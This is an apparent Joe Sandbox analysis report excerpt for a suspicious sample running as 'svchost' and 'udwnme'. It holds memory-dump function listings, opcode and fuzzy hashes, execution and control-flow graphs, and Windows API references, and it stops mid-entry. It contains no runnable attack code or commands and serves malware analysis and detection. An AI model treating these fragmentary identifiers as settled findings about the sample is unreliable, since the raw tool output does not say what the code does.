                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df28314fb8f1f20fdf9cbf30f282aaf28a90ab75f9029c8448e4e6a3b092c2bb
                                                                    • Instruction ID: 02554d23cef0caf36a134703f2a1b8679ec2db31c4ce8e53a6846022cbf3ca29
                                                                    • Opcode Fuzzy Hash: df28314fb8f1f20fdf9cbf30f282aaf28a90ab75f9029c8448e4e6a3b092c2bb
                                                                    • Instruction Fuzzy Hash: 5D2130347362038FDBA8ABF5AE5C67E7BF6BF047157004439AE0BC5188EB7089809751
                                                                    Function 05251431 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95dde45ff7f78f1a41c3bdc64cb7cde0e76bc2fe74e97a4dcd292923c5e08dd3
                                                                    • Instruction ID: 37bd55c92f3d87392d36565972645797051c70b412a35e54421973a63a1a13fc
                                                                    • Opcode Fuzzy Hash: 95dde45ff7f78f1a41c3bdc64cb7cde0e76bc2fe74e97a4dcd292923c5e08dd3
                                                                    • Instruction Fuzzy Hash: D911A071A00201DFCB56EBB8D504AAA7BF6BF883217550579E405CB368DB359D61CB80
                                                                    Function 011DD49B Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: c45768c7094d5352564760dd3755687b7c07c3d8ee6b11989f83dcef25a8ad65
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: 8911DF72504240DFDF16CF48D9C0B16BF72FB84324F2481A9D9094B256C33AD45ACBA2
                                                                    Function 011DD3AF Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: 93b1b3a6840a6cb4841fe41c6f7d009709fd63c508c7fd69e040bba26f3f80e9
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: C811E172404280CFCF16CF54D5C0B56BF72FB84324F24C5A9D8090BA96C33AE45ACBA1
                                                                    Function 05251440 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c8be43971eff14948c737f70b7d7cc81187014b559ca7a3d809d9b1ea2174d0e
                                                                    • Instruction ID: dc16ff978f8d3376d44bca2959342b4b329dbaab311c0fde14d2aec085c554ff
                                                                    • Opcode Fuzzy Hash: c8be43971eff14948c737f70b7d7cc81187014b559ca7a3d809d9b1ea2174d0e
                                                                    • Instruction Fuzzy Hash: E711C071B00205DFCB55EBB9D504A2E7BF6BF8922171004B9D40ACB358EB35DC51CB91
                                                                    Function 05250E80 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04942c06da1e600648b5f43f1c425839655e8cf3d7bf66d8396b0f88aef020ad
                                                                    • Instruction ID: 4b5f2cdd4b6210bea541e7a6728e7c5895d61b74c692cb0f1ff7aaa54caa4c3a
                                                                    • Opcode Fuzzy Hash: 04942c06da1e600648b5f43f1c425839655e8cf3d7bf66d8396b0f88aef020ad
                                                                    • Instruction Fuzzy Hash: A3E08C353001005F8348966EA88485AB7DBEFC9225314447AE209CB365CD64CC014790

                                                                    Execution Graph

                                                                    Execution Coverage:17.8%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:3.4%
                                                                    Total number of Nodes:87
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 23995 5400b20 23996 5400b42 LdrInitializeThunk 23995->23996 23998 5400b7c 23996->23998 23999 5405320 24000 5405366 KiUserCallbackDispatcher 23999->24000 24002 54053b9 24000->24002 23899 1470888 23900 14708a3 23899->23900 23904 14775e6 23900->23904 23918 1477588 23900->23918 23901 1470902 23905 14775f1 23904->23905 23914 1477602 23905->23914 23932 1477ee6 23905->23932 23937 1477e38 23905->23937 23942 1477ebf 23905->23942 23947 1477f70 23905->23947 23952 1477f53 23905->23952 23957 1477e68 23905->23957 23962 1477e29 23905->23962 23967 1477f20 23905->23967 23972 1477ea2 23905->23972 23977 1477f03 23905->23977 23982 1477e85 23905->23982 23914->23901 23919 14775b7 23918->23919 23920 1477602 23919->23920 23921 1477ee6 2 API calls 23919->23921 23922 1477e85 2 API calls 23919->23922 23923 1477f03 2 API calls 23919->23923 23924 1477ea2 2 API calls 23919->23924 23925 1477f20 2 API calls 23919->23925 23926 1477e29 2 API calls 23919->23926 23927 1477e68 2 API calls 23919->23927 23928 1477f53 2 API calls 23919->23928 23929 1477f70 2 API calls 23919->23929 23930 1477ebf 2 API calls 23919->23930 23931 1477e38 2 API calls 23919->23931 23920->23901 23921->23920 23922->23920 23923->23920 23924->23920 23925->23920 23926->23920 23927->23920 23928->23920 23929->23920 23930->23920 23931->23920 23933 1477eeb 23932->23933 23934 1477f8b 23933->23934 23987 5400a7c 23933->23987 23991 5400a6a 23933->23991 23934->23914 23938 1477e5e 23937->23938 23939 1477f8b 23938->23939 23940 5400a6a KiUserExceptionDispatcher 23938->23940 23941 5400a7c KiUserExceptionDispatcher 23938->23941 23939->23914 23940->23939 23941->23939 23943 1477ec4 23942->23943 23944 1477f8b 23943->23944 23945 5400a6a KiUserExceptionDispatcher 23943->23945 23946 5400a7c KiUserExceptionDispatcher 23943->23946 23944->23914 23945->23944 23946->23944 23948 1477f75 23947->23948 23949 1477f8b 23948->23949 23950 5400a6a KiUserExceptionDispatcher 23948->23950 23951 5400a7c KiUserExceptionDispatcher 23948->23951 23949->23914 23950->23949 23951->23949 23953 1477f58 23952->23953 23954 1477f8b 23953->23954 23955 5400a6a KiUserExceptionDispatcher 23953->23955 23956 5400a7c KiUserExceptionDispatcher 23953->23956 23954->23914 23955->23954 23956->23954 23958 1477e6d 23957->23958 23959 1477f8b 23958->23959 23960 5400a6a KiUserExceptionDispatcher 23958->23960 23961 5400a7c KiUserExceptionDispatcher 23958->23961 23959->23914 23960->23959 23961->23959 23963 1477e5e 23962->23963 23964 1477f8b 23963->23964 23965 5400a6a KiUserExceptionDispatcher 23963->23965 23966 5400a7c KiUserExceptionDispatcher 23963->23966 23964->23914 23965->23964 23966->23964 23968 1477f25 23967->23968 23969 1477f8b 23968->23969 23970 5400a6a KiUserExceptionDispatcher 23968->23970 23971 5400a7c KiUserExceptionDispatcher 23968->23971 23969->23914 23970->23969 23971->23969 23973 1477ea7 23972->23973 23974 1477f8b 23973->23974 23975 5400a6a KiUserExceptionDispatcher 23973->23975 23976 5400a7c KiUserExceptionDispatcher 23973->23976 23974->23914 23975->23974 23976->23974 23978 1477f08 23977->23978 23979 1477f8b 23978->23979 23980 5400a6a KiUserExceptionDispatcher 23978->23980 23981 5400a7c KiUserExceptionDispatcher 23978->23981 23979->23914 23980->23979 23981->23979 23983 1477e8a 23982->23983 23984 1477f8b 23983->23984 23985 5400a6a KiUserExceptionDispatcher 23983->23985 23986 5400a7c KiUserExceptionDispatcher 23983->23986 23984->23914 23985->23984 23986->23984 23988 5400a7d 23987->23988 23989 5400a82 KiUserExceptionDispatcher 23988->23989 23990 5400a95 23988->23990 23989->23988 23990->23934 23992 5400a7d 23991->23992 23993 5400a95 23992->23993 23994 5400a82 KiUserExceptionDispatcher 23992->23994 23993->23934 23994->23992

                                                                    Executed Functions

                                                                    Function 05400B20 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 851 5400b20-5400b75 LdrInitializeThunk 855 5400b7c-5400b83 851->855 856 5400b85-5400bb9 855->856 857 5400bcb-5400be4 855->857 856->857 866 5400bbb-5400bc5 856->866 859 5400be6 857->859 860 5400bef 857->860 859->860 862 5400bf0 860->862 862->862 866->857
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0f9fda9bd14b5917d844e6025537f990a4612ada4a351860d5a07807d79c603b
                                                                    • Instruction ID: 5acd75cf0b44f2238b411c56a043969d4416869a9d83f8313b01e6b81402bf08
                                                                    • Opcode Fuzzy Hash: 0f9fda9bd14b5917d844e6025537f990a4612ada4a351860d5a07807d79c603b
                                                                    • Instruction Fuzzy Hash: 6C216D317012158BCB15EF68C558BAE32F6EB89304F600579D40AAB3A9DB799C42CB81
                                                                    Function 01475AC0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl
                                                                    • API String ID: 0-3439240617
                                                                    • Opcode ID: 41f51b6c14d45e95006fb51413ab335ccbbfb3b2cb75f9fc9f9177e18fc8c179
                                                                    • Instruction ID: 6ae2d6644017d87204ade541992c6d184f45d59a51c82edc28e420b1a7136a39
                                                                    • Opcode Fuzzy Hash: 41f51b6c14d45e95006fb51413ab335ccbbfb3b2cb75f9fc9f9177e18fc8c179
                                                                    • Instruction Fuzzy Hash: 3DB11F70E002098FDB14CFA9D9857EEBBF2AF88714F14852AD415AF364EB749846CF91
                                                                    Function 01476390 Relevance: .3, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64103321aa2bd3784126d3475e2913bff7ee98b487bb302ab942c0d2e6db977b
                                                                    • Instruction ID: 16f246151a457b90fd7062053a7b429f95301da8ffb56c67f37ab4d39f7476b5
                                                                    • Opcode Fuzzy Hash: 64103321aa2bd3784126d3475e2913bff7ee98b487bb302ab942c0d2e6db977b
                                                                    • Instruction Fuzzy Hash: FCB14E70E006098FEB14CFA9D9857EEBBF3AF88314F15852AD419A7364EB749845CB81
                                                                    Function 014715B8 Relevance: 6.6, Strings: 5, Instructions: 386COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 14715b8-14715d8 1 14715e6 0->1 2 14715da-14715e4 0->2 3 14715eb-14715ed 1->3 2->3 5 14715f3-147163c 3->5 6 14716d8-1471715 3->6 17 147163e-1471642 5->17 18 1471648-147168f 5->18 15 1471717-1471732 6->15 16 1471755-147177f 6->16 98 1471734 call 14716d7 15->98 99 1471734 call 14713f0 15->99 100 1471734 call 1471380 15->100 101 1471734 call 1471750 15->101 102 1471734 call 14715a8 15->102 103 1471734 call 14715b8 15->103 19 1471785-14717f7 call 1470af8 16->19 20 1471a2a-1471a8b 16->20 17->18 38 1471695-14716b9 18->38 68 14717fd-1471874 19->68 40 1471ab6-1471abf 20->40 32 147173a-147174a 52 14716c4 38->52 53 14716bb 38->53 41 1471ac1-1471ac7 40->41 42 1471a8d-1471a96 40->42 45 1471aca-1471adc 42->45 46 1471a98-1471aa6 42->46 55 1471ade-1471b14 call 1470b34 45->55 56 1471b5c-1471b5d 45->56 46->45 48 1471aa8-1471aac 46->48 49 1471ab3 48->49 50 1471aae-1471ab0 48->50 49->40 50->49 60 14716c5 52->60 53->52 59 1471b18-1471b26 55->59 58 1471b5e-1471baf call 1471bd0 56->58 56->59 87 1471bb5-1471bcd 58->87 67 1471b2c-1471b54 59->67 60->60 67->56 90 1471876-1471889 68->90 91 147188b-14718af 68->91 92 14718b6-14718ba 90->92 91->92 93 14718c5 92->93 94 14718bc 92->94 93->20 94->93 98->32 99->32 100->32 101->32 102->32 103->32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (jq$Hjq$Tefq$dLlq$dp
                                                                    • API String ID: 0-3768792601
                                                                    • Opcode ID: 07391ef05b5b1e6a2ee8fc0e61ed68970abb74baa7be2737c2573db1801eadd9
                                                                    • Instruction ID: 201f6679a2541b71bf163b3eba7b5b8f1e8a9785b6b47358fea180516f5614d9
                                                                    • Opcode Fuzzy Hash: 07391ef05b5b1e6a2ee8fc0e61ed68970abb74baa7be2737c2573db1801eadd9
                                                                    • Instruction Fuzzy Hash: 0AE18170B002059FCB18DF79C454AAEBBF6FF89700F2485AAD506DB3A5CA749C06CB91
                                                                    Function 05405311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 105 5405311-5405318 106 5405388 105->106 107 540531a-540537f 105->107 109 5405389-54053b7 KiUserCallbackDispatcher 106->109 107->106 111 54053c0-54053e6 109->111 112 54053b9-54053bf 109->112 112->111
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 054053A3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID: 4'fq
                                                                    • API String ID: 2492992576-2007657732
                                                                    • Opcode ID: 682ba5a08a2dc03d645cb0a432b84bf607b03209f994028e71d1159a1d9ace71
                                                                    • Instruction ID: 62bb58ba628b13e1f5d4a8729df710900d363a970f322ae5b062739f0a6988e0
                                                                    • Opcode Fuzzy Hash: 682ba5a08a2dc03d645cb0a432b84bf607b03209f994028e71d1159a1d9ace71
                                                                    • Instruction Fuzzy Hash: D7218DB1804399CFCB14CFA9E4446EEBFB4FB08320F24845AD455B7291C7746944CFA5
                                                                    Function 05405320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 117 5405320-54053b7 KiUserCallbackDispatcher 123 54053c0-54053e6 117->123 124 54053b9-54053bf 117->124 124->123
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 054053A3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID: 4'fq
                                                                    • API String ID: 2492992576-2007657732
                                                                    • Opcode ID: f01cd772bbe59a217a2ffdd9334eeed0e2f550eb39baedbb4c4ce8f359e6be18
                                                                    • Instruction ID: 6c65191755efc0d977de81be79ca0948e0596f5f0302e7a4e82224d1c4d1dd49
                                                                    • Opcode Fuzzy Hash: f01cd772bbe59a217a2ffdd9334eeed0e2f550eb39baedbb4c4ce8f359e6be18
                                                                    • Instruction Fuzzy Hash: B82134B180425ACFCB14CF99E944AEEBBB5FB08320F20845AD419B3390C7796945CFA5
                                                                    Function 01476DA0 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 127 1476da0-1476db6 128 1476ef4-1476f19 127->128 129 1476dbc-1476dbe 127->129 131 1476f20-1476f6b 128->131 130 1476dc4-1476dd2 129->130 129->131 136 1476e05-1476e13 130->136 137 1476dd4-1476ddc 130->137 152 1476fcd-1476fd2 131->152 153 1476f6d-1476f76 131->153 144 1476e15-1476e1d 136->144 145 1476e5a-1476e68 136->145 138 1476dde-1476de0 137->138 139 1476dea-1476e02 137->139 138->139 147 1476e1f-1476e21 144->147 148 1476e2b-1476e57 144->148 154 1476eaf-1476eb7 145->154 155 1476e6a-1476e72 145->155 147->148 157 1476fc3-1476fc7 153->157 158 1476f78-1476f7b 153->158 159 1476ec5-1476ef1 154->159 160 1476eb9-1476ebb 154->160 161 1476e74-1476e76 155->161 162 1476e80-1476eac 155->162 157->152 164 1476fd3-147701d 158->164 165 1476f7d-1476f8a 158->165 160->159 161->162 166 1476f8c-1476f98 165->166 167 1476f9a-1476fa2 165->167 166->167 178 1476fb8-1476fc1 166->178 174 1476fa7-1476fb7 167->174 178->157 178->158
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (jq$(jq
                                                                    • API String ID: 0-2294966697
                                                                    • Opcode ID: dae022321ef00a0e80d3215e18d1d386e40f1b4368735f5f704336fd97b17f09
                                                                    • Instruction ID: e181fdd9ca3437874386ee5fc69036056d3e9935ff7d9a90e85718def5a9ddd7
                                                                    • Opcode Fuzzy Hash: dae022321ef00a0e80d3215e18d1d386e40f1b4368735f5f704336fd97b17f09
                                                                    • Instruction Fuzzy Hash: F571CC713046018FDB19DF2DD89096FBBE6EFC421071585ABE909CB39ADE30EC4687A1
                                                                    Function 01476108 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 282 1476108-1476194 285 1476196-14761a1 282->285 286 14761de-14761e0 282->286 285->286 288 14761a3-14761af 285->288 287 14761e2-14761fa 286->287 295 1476244-1476246 287->295 296 14761fc-1476207 287->296 289 14761d2-14761dc 288->289 290 14761b1-14761bb 288->290 289->287 291 14761bf-14761ce 290->291 292 14761bd 290->292 291->291 294 14761d0 291->294 292->291 294->289 297 1476248-14762a1 295->297 296->295 298 1476209-1476215 296->298 307 14762a3-14762a9 297->307 308 14762aa-14762ca 297->308 299 1476217-1476221 298->299 300 1476238-1476242 298->300 302 1476225-1476234 299->302 303 1476223 299->303 300->297 302->302 304 1476236 302->304 303->302 304->300 307->308 312 14762d4-1476307 308->312 315 1476317-147631b 312->315 316 1476309-147630d 312->316 318 147631d-1476321 315->318 319 147632b-147632f 315->319 316->315 317 147630f-1476312 call 1470c34 316->317 317->315 318->319 321 1476323-1476326 call 1470c34 318->321 322 1476331-1476335 319->322 323 147633f-1476343 319->323 321->319 322->323 327 1476337 322->327 324 1476345-1476349 323->324 325 1476353 323->325 324->325 328 147634b 324->328 329 1476354 325->329 327->323 328->325 329->329
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 0862042bc4e31dc9c89f3e5a4d336292d26c12c32b7b61f538f7ad6f252d5774
                                                                    • Instruction ID: fbd9a2a6577cd8dc36ce3bf4291df5ee9efb2f2adb5db3b2df8af8feb91cad88
                                                                    • Opcode Fuzzy Hash: 0862042bc4e31dc9c89f3e5a4d336292d26c12c32b7b61f538f7ad6f252d5774
                                                                    • Instruction Fuzzy Hash: 40715CB0E00609CFEF14DFA9D9457DEBBF2AF88314F15802AD415A7364DB749842CB91
                                                                    Function 014760FC Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 234 14760fc-1476194 237 1476196-14761a1 234->237 238 14761de-14761e0 234->238 237->238 240 14761a3-14761af 237->240 239 14761e2-14761fa 238->239 247 1476244-1476246 239->247 248 14761fc-1476207 239->248 241 14761d2-14761dc 240->241 242 14761b1-14761bb 240->242 241->239 243 14761bf-14761ce 242->243 244 14761bd 242->244 243->243 246 14761d0 243->246 244->243 246->241 249 1476248-147625a 247->249 248->247 250 1476209-1476215 248->250 257 1476261-147628d 249->257 251 1476217-1476221 250->251 252 1476238-1476242 250->252 254 1476225-1476234 251->254 255 1476223 251->255 252->249 254->254 256 1476236 254->256 255->254 256->252 258 1476293-14762a1 257->258 259 14762a3-14762a9 258->259 260 14762aa-14762b8 258->260 259->260 263 14762c0-14762ca 260->263 264 14762d4-1476307 263->264 267 1476317-147631b 264->267 268 1476309-147630d 264->268 270 147631d-1476321 267->270 271 147632b-147632f 267->271 268->267 269 147630f-1476312 call 1470c34 268->269 269->267 270->271 273 1476323-1476326 call 1470c34 270->273 274 1476331-1476335 271->274 275 147633f-1476343 271->275 273->271 274->275 279 1476337 274->279 276 1476345-1476349 275->276 277 1476353 275->277 276->277 280 147634b 276->280 281 1476354 277->281 279->275 280->277 281->281
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: c68edf534f263bda744d8b4598d7f2bab4a5a91b40f7de1e221c19333d33c285
                                                                    • Instruction ID: e99d356219af1513d5dd81eaac72dddb3731f4b49b2d11c7dfe32cff15cf8bab
                                                                    • Opcode Fuzzy Hash: c68edf534f263bda744d8b4598d7f2bab4a5a91b40f7de1e221c19333d33c285
                                                                    • Instruction Fuzzy Hash: 14715BB0E00609CFEB14DFA9D9857DEBBF2AF88314F15812AE415A7364DB749842CB91
                                                                    Function 01477020 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 371 1477020-14770f0 call 1470ce4 384 14770f5-147711c 371->384 385 14770f2 371->385 389 1477121-147712a 384->389 390 147711e 384->390 385->384 391 1477130-1477145 389->391 390->389 393 147714b-14771a6 call 1470b08 391->393 401 14771b1-14771b3 393->401 402 14771a8 393->402 405 14771b5-14771e1 401->405 406 1477140-1477142 401->406 403 14771af-14771b0 402->403 403->401 405->403 409 14771e3-14771e4 405->409 406->393 410 14771e6-14771e8 409->410 411 14771ef 409->411 410->411 412 14771f0 411->412 412->412
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq$dLlq
                                                                    • API String ID: 0-1852568965
                                                                    • Opcode ID: da5225edc9d07b6552dbcf70bc245839ffe0beee6809378790c9f4188f1a9e0d
                                                                    • Instruction ID: 9d4a1556c66abb8e2f7d31443c722f429f317e7a8124dc04ac868541ac93544f
                                                                    • Opcode Fuzzy Hash: da5225edc9d07b6552dbcf70bc245839ffe0beee6809378790c9f4188f1a9e0d
                                                                    • Instruction Fuzzy Hash: 6D51F474B102049FCB44DF69D498AAEBBF6FF89711B2540AAE506DB3B1DB71DC018B40
                                                                    Function 01471750 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 453 1471750-147175d 454 147175f-147177f 453->454 455 147179d-14717f7 453->455 456 1471785-147179a call 1470af8 454->456 457 1471a2a-1471a8b 454->457 479 14717fd-1471874 455->479 456->455 470 1471ab6-1471abf 457->470 471 1471ac1-1471ac7 470->471 472 1471a8d-1471a96 470->472 474 1471aca-1471adc 472->474 475 1471a98-1471aa6 472->475 481 1471ade-1471b14 call 1470b34 474->481 482 1471b5c-1471b5d 474->482 475->474 476 1471aa8-1471aac 475->476 477 1471ab3 476->477 478 1471aae-1471ab0 476->478 477->470 478->477 509 1471876-1471889 479->509 510 147188b-14718af 479->510 485 1471b18-1471b26 481->485 484 1471b5e-1471baf call 1471bd0 482->484 482->485 516 1471bb5-1471bcd 484->516 492 1471b2c-1471b54 485->492 492->482 511 14718b6-14718ba 509->511 510->511 513 14718c5 511->513 514 14718bc 511->514 513->457 514->513
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq$dp
                                                                    • API String ID: 0-253423911
                                                                    • Opcode ID: c44ad950e3c946003777729a20c5414d2d4d7bce808f988f7c017d8b00f4c9dc
                                                                    • Instruction ID: c415a909e3bf9e7f73aa1574f3493d89c1439d2d531c8826196a3b5959430aae
                                                                    • Opcode Fuzzy Hash: c44ad950e3c946003777729a20c5414d2d4d7bce808f988f7c017d8b00f4c9dc
                                                                    • Instruction Fuzzy Hash: 29410C74B101108FD7549F29D458AAEBBF6BF88B10F25809AE816DB3B5CA75DC05CB90
                                                                    Function 01478970 Relevance: 1.9, Strings: 1, Instructions: 668COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 521 1478970-1478997 523 14789a1-14789cf 521->523 524 1478999-14789a0 521->524 528 14789e6-14789f3 523->528 529 14789d1-14789d4 523->529 530 14789f5-14789fe 528->530 531 1478a1f-1478a26 528->531 683 14789d8 call 14795fb 529->683 684 14789d8 call 14794eb 529->684 533 1478a27-14794e0 530->533 534 1478a00 530->534 532 14789de-14789e4 532->528 532->529 685 1478a04 call 1478940 534->685 686 1478a04 call 1478970 534->686 535 1478a0a-1478a1d 535->530 535->531 683->532 684->532 685->535 686->535
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
